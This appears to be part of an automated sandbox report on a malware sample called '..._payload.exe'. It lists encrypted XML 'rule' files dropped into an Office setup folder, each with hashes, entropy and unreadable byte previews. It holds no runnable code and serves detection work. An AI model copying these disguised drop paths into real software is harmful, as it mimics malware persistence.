                                                                                                                                                                      Preview:.<?!.....o..0.*r..nr..6. M.A....._..1...e...NT'.b9..`F.'<....^..A0....Pe......a".._A1.VDk.^._.o..;..&../.....9'-R'..Yb.j..gR\.......K....uv&.6.K..]..s5O.~l.G.oC-...W.p.-....._p.N..C=.Ja........0Y32d..a.-......z.}.-.(".V~....j.c...|......7.S...:*.Q......m.<T&\..m2F.z.d...._..?w=..TNd.$..R......g.u..u}.h....Qs.t.....5.'.av.jj...X....=.^............d@..T.......~...)._9..^r1!k.}-Z.p.....}.(..T+...H..).........D..~..U].L=`.az2x...pj.....&...B...#".w....K$...."f+.}....G.,.....+.....2..<..e.0............a..h:93..S9...<C...nb,.z;...H?8..0Y.D...N.S&g.Y.'2f.....g{.K.A..k.VB...*7r....;.1.\.C.u.........<...%..M*d.......3....;.q.k.../..\T.e.......C..X.*..(/....s,.E..>..%.,.u..Ai.R...!(w...rc.3Y...c..`u.>L..8.......4.\._.'7.7....R.b.<."|#.p..n9w..-.*....W....^6OV.Q^....z8.B...|%...m..g......@w.x.|x..HE.{.8.'.+..E.....3.(?{..{.U...X.....[....u.~~.{..B.....U.....;......[.._..#..U.......V.\.5y5/......n.3..V.-...<.He..=....0.xuH....,${...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703351v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.878875697492727
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fvpv4aAWzgtSjJdt+rZ+p1TwpOfKX/dnMm0IzD:fwWzgteJXgZ2/Emmzf
                                                                                                                                                                      MD5:BF61476C3BD5EDE0257854F004DECE49
                                                                                                                                                                      SHA1:B0C2450DC75C66C0A014B1176A9413E66C4C5D78
                                                                                                                                                                      SHA-256:3D174BB8FFE37637F433BE2D37312EC6198C4B7D54BD129C7860B94274B01F2C
                                                                                                                                                                      SHA-512:27C15AC5A78B65CCF618A0FAA7834F0EC905430FFA134A9C620212F8DB898BF7B392C95FD623FDDA9ED0B66491AB5BBE865CB1148FC0958D96D58ABD9F9BB9DD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..<K..M?s..<d...q"......(-........N..:.1&7..n.YZ.<X.7.r5..=..W.z.....T.R..uL7..is3.... .p..R.d.D...Z....y.^....-.iB&.\.%.^9q..H.I..7..~.y.C........S1...SnS......_.G.+.Bx!5....F..>._z9)..C{o ..g..7X..i.=.......O...g..........Z?./Y...`C6.l..S...:.'lDn....p...o0..l......B.....c.3B~...m...M.w....Z&$..m..Q.Dg.6...@..8I"A..AK.y..LT.Y....5.....7@.V.Kg'..v.of$...2.......;...N..`x.c.....?....7.[...A.,>.....4.M,0....W;...6..r...w....7d.M}.9/..6...sP..\....Rw.."....V.]vMqE10.a..p4....K.E..q..a.?..VF..c...:D.b..d\.j-.8......._.}...s6..`.@E]..`.c&...m.5...$3p..TZ.o.......|r>..J.......@.q(...\..-.C.,O9...bf.6^~.....=.-..;A.= .J\H.i.4'.....cD.y@9..4...XAv6k}...~.r....c9%.g.s....7.. .v..#......=y..6p.8.W.<.Z8...R]..#..u...1g.......<.Ja..95.t...1D).*....@..r.....;]...md...T_.....r..&...../......<~B..5R..).z.).Uk..3,4.....*#.U.h... D..c.\.7......"E.S..G..U;..2.......ko...f.#...... .3nQTD.S.h.B..c`.f.........|.9k/Zjx.Qf,.uj..o~f.....J...-.Y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703400v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1722
                                                                                                                                                                      Entropy (8bit):7.887364547906849
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:N8nFZs4SSFPulJ7C2dKdwXyKgGW3hOHhWnD:GAWE+dEngzS0
                                                                                                                                                                      MD5:C13A71140D11577BAF022BBBBB0886D2
                                                                                                                                                                      SHA1:8C952AF7B93977CC050E3DBFF11EA8EE49682EE8
                                                                                                                                                                      SHA-256:59C533AC3A5EA922F8794EB59A9FF2844137FAB8B33C4365A8AA0C4C76DBC7C2
                                                                                                                                                                      SHA-512:6605688B8BEE7AAD9D81610EA8B4451F5ABE668DC0DBC4496A6A31D1CCD45C9661D730670C6EEB63F317257F0761F30CA88F644025F2FE64B9A0E722CDF8EF08
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.......tk.......R.D.F...!......j......rAi....E...8X...n..l.............?.j..F.+..y.K.ps.K&....S...*.u..4....N....._...V..:... (.....[.....S...4..O.v..9....V{. %.T.........q..=.R:..i....K1.......<u.OvM.3...Zp..fD.$..oN.."~`....... ....#...d.....$_Y...-...?.. &T..?..>.R.L.L..(..y ..p&8..de...pg...*.[."...2......Z.P..lC......w.{.4-[....A.`...}.")..&.U.@....UV..~...s-.||..g..V..........Hg..j...py......Hj..{..u.%.!....".....Q..\u-%.D....&..S!)E..#...f\.Sz.....c/......X.........8..)..S.....D......%....W.(.`..K..U..v......>.V...TK5n.-D{.L(zt.:....R.\.)....l./.`{.E....L.{..;..5...$.A..%.f.....J7ga..l.Wv.....F...{$P..m.p.n5j.R.$|....$..b...\..a....1.K..W......k:.+4._....;%!......h......XiQ...>aV..BTc...#zo..%_.Lg...:-...p..q....@..=Y$.........!..|.I.S.r....^.C.w.S.=....B..5..k..i..._fH.>.k.....6W........Y.3.....B/.2.3RE.....].>...`...M..5#....}X.-..G..q..n.6......jzH......&zi.....u..nR.A...R...\;..(o.cp.....w.vV.@.O......`.`.f

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703401v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1759
                                                                                                                                                                      Entropy (8bit):7.885849919011188
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:38YAKDompB9icQmQPNXXGzywX/6mes6vvLRG2AYpID:38SzpBzQmcXSXypJvvLRGRmU
                                                                                                                                                                      MD5:988FFF95B6DE32C33BAD025885615821
                                                                                                                                                                      SHA1:4BEA79A65896BED993A99048B8A2680F1DD733E0
                                                                                                                                                                      SHA-256:FDD6EB2D43530C7E17D6122018DB7A4D2C6B471CC66FCFD5B82266170C88793A
                                                                                                                                                                      SHA-512:6EE4601EA8A2652B62B38E9A4C8BF2DBBE17EC16EA06401E58AFE55C8A86EF6D16D39D68F86116920BB821E7788A3813911A658BCB397D35DF57EECCDA88F625
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..O.8.K.../+!PZ..].,cS......mgo..=;...S$@O...xa.Q~....K@.m..'(/.7.>...|z.L./....z...I.}p.+4..7. x..'B.n..j......|-.i.H%p....Y....!...+1.....8[.Z".;..Z.NE...L...-.v9,....Y..]..{^.T8.....XS{......z..F.Zw.=....@).....c.\'...)..+.z...z....t.....G....7Ft..q.&5.k....s,G...4[.w...+.o.6gj..`.Q.N'z...n-08..=..mC>.{.......5...0]...~5J..e.P..=..#..*.Y..t<^.....5.n.)c..h....p.z....6I.`Cz!..Vv...........Zo....k.^....%..s9f...5R4.C..;K.@Y.zPD;#..;9...1<..G...]..........b..g.....sQI+Nu4......41jA.Dw....z....}.,s3m..L.T...b*r....3...k.lY0iMB..rCy............l.oE.Z:....bt}...6.....[r.....SG..e.. .(...,k.&'.l.gy...k..@......6<P.....w..%*.s....V..Ws..4pG..{=. ..P.xcB...vZ;....J.....}n..[L E....P..K..e..AAa...F.B..\T..W...O.v.[........j....`v.(.6...6.....<.C.].Y/.T.B....9...U....z:..5...c.7.[r .....l..y.g.|U...z..T7.........4.........6..........P.-....Q.&..L....GWj.D^....;...#.tt...+.. ..v..N.9.n.......N..._!...VU..5.....:..j.{...M.....c...7..a

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                      Entropy (8bit):7.882879020106907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/jtQb5eH99gbwPtiV4fYF76WRdJGGOcgnkD:rtScd9gbwPQV4gF7vB/OcUw
                                                                                                                                                                      MD5:B68794F833BA7BE4125BEBC2CDF81387
                                                                                                                                                                      SHA1:E687AC5607E711B3A1D988777354BD6B77D19A37
                                                                                                                                                                      SHA-256:7C55EBB4AA066A689E0E0A6CB2FB32561E935A84CF9087BB37BF46B9BD26F9A4
                                                                                                                                                                      SHA-512:EECA0FE43A3CD52C27E69491EC6B38A6DF06D9098A5AA11CC0C6B8817C57C0F2908342E229FB75A8139210CE6C16F076309E737F0865C4EDFE7FD62EEF0700FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.(....."....tO.L.Gb...UbSe.j!.YYvk.sw.eh....GvK.'...-.GoO.L.-M...\....bkl..O,.E.7.}.N5..n..}.8.t..:.)....^..D<....[{-G..z.b..7.).c...R..v.81.V..ty..T....b~...... N._xR)...s..M.h....4.v`.5G=I]..l.1.r....0L6EN.l?z..M.t...S..a.....P...]......{....-1..).p.>.g..-.M.(.a...k..=.....E...i..m..1^.5%.:Y.1.E.......[..n.t.dOR...e.h]'......}[d d....B..8.....D.`P......X.[.].8].)+...@;A.!.H.jgP......t:....9V...W..b...[..7...S4..CB&.....P-0/..G..?....k.;..a.FS.8..}qS[O.!..]<..zB..D..*....K.'..W.-pM....-.n...R7."e...%^@..$a{.O...w#..>.x^..T.......-$2..K..+....Hg..b("..4.t.....G..S..$..^..D.Z..lx.....^....`.O.}..R..(.....s&.\.\Z....i#.)L<!b.G.X;"..|5l.....$QU..a.....Z...e..1..."W+.H...I..k6J....:..S.CPK..?}.o..Y!..NN.$..Jp..h.aDv3.`.Qs3.....KE@;.mE.E.%.R6...c..s.......w7.Zl...+Z4b...Zf.F.u ...d..#......01...rky$M..ALP.....s.S@.....6..`...%..=.}..Mi.j3%.:..15.......V@|.N..Is.h)x....b...hD.e...........ie.#..A..........r...\.W...}.<p....rg..Yg.....g!.2.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1743
                                                                                                                                                                      Entropy (8bit):7.902567658044586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9q/D+oGxHvRCQjE1a/k//zcMNnNqMCM7fxD:9q/D+jxH5XjN/OzcMnUM7x
                                                                                                                                                                      MD5:11CE290D72259D01C5637D0EE15FB88E
                                                                                                                                                                      SHA1:7BFE187773276FE1B76A06B39F2D7F1F7569B4BE
                                                                                                                                                                      SHA-256:F74D1707A68E403393418EB2470CA6777011A0A95D7F0B2D2F8D226F590265D7
                                                                                                                                                                      SHA-512:2AE46291E9F462F207B592E9DA562B39133BBCC6F984A3170FDF661919F38D50D8228A66D747BEC4FB2059554900B0D98AFA8509D4318E65317BEA1E5BD2B4F9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..y..~......M.p...&._..['.5.:D....JX..f....j....J....M.GI.:...g.&qm..`.u/.&.g..-n...D*G..93n..A....w.^.!.&..a..#.x.C..H.... ...P.....0.8..H:..).Z...a.O.P..".X..O.).....|..'1.9..,......b...N...>..'....I.2v.......'|+.5;'A..o;l.x>..C...||....k/...kwl..k.6..j...;D?.. X..Xl.a-..!I.bP.3.V..eeiG'.-...]U..~.s8......k.i0&.../i"..|....Q|(&.k...v.<2..........q.;~..&..I.6..n8.J.2.....>..s$...O.. ...r..._.k.....'...1....H.b...^....P<..vM.....&d.<J.CQVf..|.&{.+....r...|......_g....h...t..X....BI..P..../o%....I.-.6q.....}.@p2+ks.7.....S......Z.Y&..+......t...oU.,......b).h.V6.......J....\-..L....[0.Y+.].<.....T.w..&~VN.. .h....).jL5c./.Be....t4.{.Nz........8....T...x......vt@..Z.....s.rqx5..[.7yVV.../..U... ..*)J9DA..4.......`..G...9.|..u....0.{..S.a..f.q)...3.....?Q....l%$/S.H..O..l...A...Cg..W...5D......f...*E&02..Y.?v.s .T.}..P ....>...B...9`.%'...l......~..8..}.....f...K.D....6.g...2........~N..........C...y.g.k.5..S]...I..x.....7...S%.Z[OH .,1Zp

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703500v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.896876359138813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ySjqfdjp3VHunSvXOaTEsXhiAb4ZNLR0D:yaq9PHunSTpX0AsZ/g
                                                                                                                                                                      MD5:E3B560A6EA7562DBF54F48128DD66B83
                                                                                                                                                                      SHA1:6EF638A566E560750D0D093287B216D6A446BA55
                                                                                                                                                                      SHA-256:68DF29AD90EA090426F8F6AFC9F774E3C0EACC14F4AB63BA497AA029A3B0E997
                                                                                                                                                                      SHA-512:24FF82801FFC027637F772ED82D0CA69A48D4846498D4708CF15621A71F373A8A88B7D18D5AAE0089442E7D87398C101123D263D7C4ABDE38B400BF3DADFA1C9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.L...w.....~-KM..0.={.|$.[W.A.c]&G.w............j.|B.W5..`%...!y.O_'Vsxf.t...........x...w...{J..k......0.).d....y.1..~.&;..f.8...I..z..OID....LO...z].NSH\ t.....Ya.,.U.._@N..l..7.yr..\......5.@...........s./)rMh..4..>.8<.j*.|.i'X...C.:..N@wVS...1QB.....wI.1..w..b.Q..B.G...-.&..B0T.2.f......\.2f.iv.U....S.E$..]..@{.l.|"=j.....~..`..*..)R(S7YH..n..]B.b_(!.@..u.B.A...{...$....F..1......RvO~.>6.......Gy.$1.O.....H....<...E.........t..e_].~....6.^f....ik.B.......P...n.....S_Od=.*By.u4S7bD+.....a.I.?9h.....j.....;#..,.....U.KH...3.#g.L.\.IA..FV,b..1d...n.B..3#.d..{..4d..L.....Vb&!.......D%;.*Rb`g.K51.J.]Ft[.#.........B...d..H.1I..=V.4.P.m..[y.R^.....g.1A./...Q....G.....a..Y+.5.t.]V.0.iB.@k..[.Y..B<Z../.].......JzW~B`/H.i..c..j..S(......V...<.p:............o....c.lo.......J.0..jv.`.....5"..p..*j.C....bj..,..W=5.|...S...e..R..Ss......1.x...C....$C..Mr^.4.2. ..M..o~...71...sMI'x.>.p....h.IB.. .......]...I../,.gY3.g........{.;.]$b..N....e..f..&{.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703501v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.872223774640443
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:mexbWfLXj3JQ199NA+q5Hll2MdCEL5BWD:rxuLz3JQZQcEtBO
                                                                                                                                                                      MD5:B1D1A0238AE1A4BA91A17371AA239777
                                                                                                                                                                      SHA1:0F6BED1F0613849FA241A74A5A1C2F611DF07428
                                                                                                                                                                      SHA-256:0B558775FBFEDCB574196F09221D7145E03455281464C5CA88CF4027E7641C38
                                                                                                                                                                      SHA-512:FD793AC4ACBD12573D8F36694A83256744BFB25EFE14693C9C9155DC79B9AF851CD6F63DE04DA279F152CAB8EC10712E2852340B5B0E03BAE5D03E1964BC79B1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.-.....B....w..<.P....P..?k<f........|5(.?....Ub64ah.....c.h=r..G.}.....t.D."...JE.....>...U4...M.....~s..8.}..A...0.....O.............I...2.&`..fR_4$Iy_Y..i"U....|..|........5.kV..WF.+.^.:f.h.Z(].?.8Z&...#4..&.*.....E.S0sXw.kC.Zq..j#}w....j.E.[U...g...x...:..qK4.>..8~......)....lVM(....0..Ir.a6..K{?....;..<.y`..7...s..Be...V.....1..yqb.......J.........R.wl..x.dh...B..H.w..9..........f.b..f..K..R.._....|.......t5.i '.'.....%-C..#......r..;.f....r:..z..........-..-.4.~$W...{F....5qX.z..~b.\..e ..0..L3+..Hb.....F...C.J..3:[O..Z.c...2VK....y....S...q."p..,6.k.3].o..[.!....*UtHPH....7...s...O.]M:..... .7.?....[.%.w...o..*....*M..FQ....A.F...sr..c....:....D.^.?. ...]-w..W....]F..Ea....V.s]y..3.5....6.MJ.rqc.-.mp6R..5..r.Cc.+.D.Nc.K.........h(R...eQ..E^X..+..B.-_..J....!.N...P.r}..1.Y.M..{*n....Hw...]u?..e$;.>...9......m....W....;f [..c...E.J..CO..v.`............S....m,...2p..Q..6......5..V.1|V.6p....E...}..j.(.|.T.g.]..S.'`T.T.*.s.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703550v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                      Entropy (8bit):7.876259015073326
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/WocpEYMpzT7GJ8koVFVOGGyrjTCqwtdwzlED:+LqfzHGCfN+qjTCnO2
                                                                                                                                                                      MD5:BDE552593F5BCDBA9A047B8C96F64E59
                                                                                                                                                                      SHA1:3C6EFC773F54A440AEDAB24C9E32349F2547FE21
                                                                                                                                                                      SHA-256:9F5AB8534BFD44E94C828C69B90FBE42A1F7A59B1B76B37EF74E2A32A32E6C62
                                                                                                                                                                      SHA-512:FF20F5B0EF0C2D1A332EA9EB6775BE917E7C1D68072D65628EB32698A7B5FEDB1BC5660396D4F6D40F9972B8CDD04E21310E53FE0AF54C3186B4BA01183216F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?PI....^w,.r......<.o...7.#6~.r....s. Q...'.....M@z..]-...8.&C.?)\..c.e.tEM.>...X.9...6w}..".!.w..&..=~.j..r...#H.h..;.........U..w..#.$....e.......).j.k.F..X.3I.(..".W.....*.S*.q.O!..;.2[U..bX&e,/.5D.....7...9i..Z.a.9..,/..A.60.l...3...'.k......n)..p=....]..Q.....q..8)./.hn.j...1.}.8=F.sFO6.........T.1G...kes.......A}X....bC.iL`..#.IL..a.....q..q9,a.C.O.b....I;.............->!".RX%o.n..;UI....d.............r.[m.......6..x.2.... .r..}..$4..\.C.....+....U.bD.~...I8.H....F......L~n..4.A. ..k.)!.G{.l.+{....x...*......il".B....e.jd.(...\...5.....!Gzx.Y.....]2[..l.X.n..:I........|s....8?...i.H@.ms.]..^.$..).O.w.F.5.#6..>.........=!&..+.s....t...5`=a../2k....Eh0w7*qc.US.Q.0._..W.pU....F".,....#.%x.....z^...T0..M...._p..e.......i.<.._.AK.b...c.J...|...7b..../R....Q.6G.E...H. ^Ru!....&...O....=...4. ./..sjc:.qQY...m@)... )8......<m......V.SX.%.#....uKu.0.......VJQ.....j......;..d.r..m.m. .0....o...4.W..H5Rd...Ti1....<..=6.K.^D}...G.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703551v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1743
                                                                                                                                                                      Entropy (8bit):7.867776087117321
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:EpVhRrCuwTdoYzIcMYpfxxwsEopl9EnVv01e8J3yx02D:CRrLUZIcMEf4cQnVH3r
                                                                                                                                                                      MD5:B295DD039B524D0DF546589A9DD602B4
                                                                                                                                                                      SHA1:6476C5E3A3873C7F053C5A33621971319D89698B
                                                                                                                                                                      SHA-256:2852098D33E8648137BCDEE3F10D0F483E44F53A605D0B5D2FCBA9A57BC6C2B8
                                                                                                                                                                      SHA-512:CF19792B6ED9E3488DB1132E3BA0356260DF86E83F8C1492E53D4D128D72AAA9F66BF7146D333CDB5A6B859F8A50FB29E2FD9222E53C0CFC31D6F2BB7D6396A6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....v<..Tf."x;..P.t.OY0..-.\.R....+...C.g........V...-...\..]r..4.G&$Lu...d.J.B.....x...[pmT.9%.X...0..6.cT......3....siVn;..3...Os..^.hdz.7d.}....j..._.8|..]&.6.{...zn....}.........X.v..H../7.(...U9.~..5..~..(,\.....y...3..<.]CKZ.T.W.g.tH.$.,........4..u$.`.E..kY9=.Bau.J..#..R..}..*......`.].-.&...L@.ef....I.7...D..o....u.~...mp./V.(F*.C..8~...z2.{..7{j$!.w..Z......M&...2.. ....u.f...%K*..`M.h....e.;#.....N.^#..Ke......c@rRq@g.X......o./g.g(.%c$....h.|.io.j...:v.u..rQ..*Q.=...F.(~.z..K~...K......ga.O..A|.JH...D..1.'.6....d....b..:..1...-..K{...I......HJ+.......JN.p."p.EE....~i]..]w......{..6%.?`.%{..>L!G..d.6j..`....?.9}...j..+.F...@...K1X..+......W......!1........L.2....uJ..#@...m.*.$......y'.].@....7izf.Z...$,..F6v..UeFo.E.;.O..#.....FI..$...sf.......<`U...~...zFa8u.....OM..>..s.....n....._.1.......3.Og...N..j..h.=...kf.0U...km.z.z[.+]/.&a..>>.....C..D....X.(..x>}7.nkI.n..E....m."f...n..kb..P..N...X......!A..X......8.2...3z.?-......B.*...v

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703600v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1692
                                                                                                                                                                      Entropy (8bit):7.886031314625132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3RNWKQ3qpnI8WKiFsbiVh5Q5Vivp624CkTgMVD:h8gIsJbi63ivMNCkEMt
                                                                                                                                                                      MD5:E947ECD6D5B3F3E6084529D0F79946CB
                                                                                                                                                                      SHA1:A13FEFDA44628043F12CE621F6840242ED026E71
                                                                                                                                                                      SHA-256:0FD84579CCFC70F672C14ED16B132F238C4520F62F6031B8C1EA502DFEDFF4A9
                                                                                                                                                                      SHA-512:79897F2C94864F699B3E332A6946BA424D611FC8C02C6226FBAD98ECBA952684F6DBEA887602C29A418DE50C8901019C11E5F1460ABD863CDE3A8909834D54A5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..^Ypm...B.:Z..=...E.3.8c..W.1.s..-.n....(P..1O7......XV.8c".7A?....y..BN.C..2T.r..v....9G$.......e.wY.... *...$.............(....B..fh............L. ..f6......:..........d.F.!LG.._{..Z........{!........-....."....Gv.<YS..R;....8.&Gb.]..).).c.6.j.Q......n...vA.H..M.|.x..}.`..X.*.............x@.......p..0..#..{.~..j...BF.m...5F...%..k.....#sg.r;....i"..UU.'.RZ@G%........\=......J.z*T..N.*..~.."....9d....k..]....;..p.....n.k..f9}%(MJ..I,.....n..c..;c.N.n.)......U]g.~pn.1N.=...].T4|D..(....H.&c.m...G.2..h..I....yh57......7.bR...............H.C...6UxH.>.D..9x.x.c.u....P.._...<-..x..G...$.K....z...x.... ..I...0..5...ai.=E.^...p.Yz.3.I.~.C@.vsx.q?d]i.6C~........;.9t.n.S}]i+!....h..zu.<$grM....8<.&.......W.[2'..%;ua.....-...H:$.S{.fM1.....Y..p...z...mB...B~M..bD&.y...*.H..7....j....ma.D7?-A[...#.:\R..}.m....|...&}".j...lB..C,;..........3.x.I.?...F.Z.*.........F^.~..)x..O..@..Uk..........i.e.t....T.".W.^@.v.n0.zt0..R...`x...T.hB...>.Z..:@>.*.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703601v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1729
                                                                                                                                                                      Entropy (8bit):7.897882935511665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:OiTCQAwSd8cMRldd8t62ODL0BWCWZjoHg0ux3D:BSduRRe629hWZj/
                                                                                                                                                                      MD5:651968082A648424263511E49381F5C8
                                                                                                                                                                      SHA1:D7A4C022C3EFA2DBE4500DB27A446479E266DC35
                                                                                                                                                                      SHA-256:9A10031007A5CF9CE78F8351AF25B2119ABDD6FEAAF21261F3CB005E500E8515
                                                                                                                                                                      SHA-512:CCF38557F36CCB415322A4988378D63307F3AB27BC0E866172E73C22CCAD7D4162C5736EEC80988DFA1C5BCD2129B2300192D3B7E5746E71760ED409A2066933
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.l...9..Q...D....eJ+.......r.W.......J.<..hBK..%QS.`{M..w...H{z....bEB.~G?.D.iL[Ii..!../:R.K......O.'..,Z.....e....p.P..+&V5Y..rH&...YW.cr....Mzq.d]&.=uI9z..XQ..*.`.C...Q..u..>.....I..Z....].2.N..Q'.O. ....... "Al..A".6.....s.(..O.....l.8.W._p#2oTdW.jp..,*...|..TXF..|:].z._.g..,.............{x....N5.`.....9...~.x...K:.>..y.O.h....|..'...P.......r3u..TZ.a.l.$..."(.. .V.t.C.....^..~z.]JA.e..Wi..e)^.....>..<j..*...J.g...l...P.....x]i.v.;..~.m.*.M.W.xzAD.....17...b..@.....YR...r.V.*...!..}^.y0:y.H..x.T...Y..J}.!..])...Wl......Q).5.n.....J.l..f.o..p.R..c^...vY.ef`+.v..x.9..9.%b\....\...........%..I....r..EI.U..y..Z..-..Cy?~m.6x.U...z..._..S......L~..?.6e.\DT6....6.+...n..{my..M..qT1.7....aT....O....Xk...\.8...i..iIqc.2a.;....m.f+S..Y..zB.o...$8....S.......Y...$.....k..,...a.'.."......$...EX9=.K...|.a.?)...t........v;Ziej..;.....d..%K....h.N..O5.E..5K#q..U.....4"..m..........H5.n..P.w.g..=.j2+.L.)5.N....E2r....2... J.[c..:. ...0i.q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703650v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1694
                                                                                                                                                                      Entropy (8bit):7.916574232334849
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:XKDumLbs07X2Wvo5/LB8jjIsnNdbDq/PFND:XK6sb1lULB848VGb
                                                                                                                                                                      MD5:B90B1AC90298C09DC06D94E49FB4075D
                                                                                                                                                                      SHA1:E822A663D4CC708774F3DE2DD91C5F95B7373B82
                                                                                                                                                                      SHA-256:912737F010DC1DF653E8C766457553ACB2E8133A56DF999E9F6B6A8A9EE51CC9
                                                                                                                                                                      SHA-512:AA0FD7AEFFC9D755C4FA988D81818E51971726D9EDD7C84F1454E076050995D83770728BAC44EB5E3A3A6F06713793026830BC7C8C90DBD1F617186E92664311
                                                                                                                                                                      Malicious:false
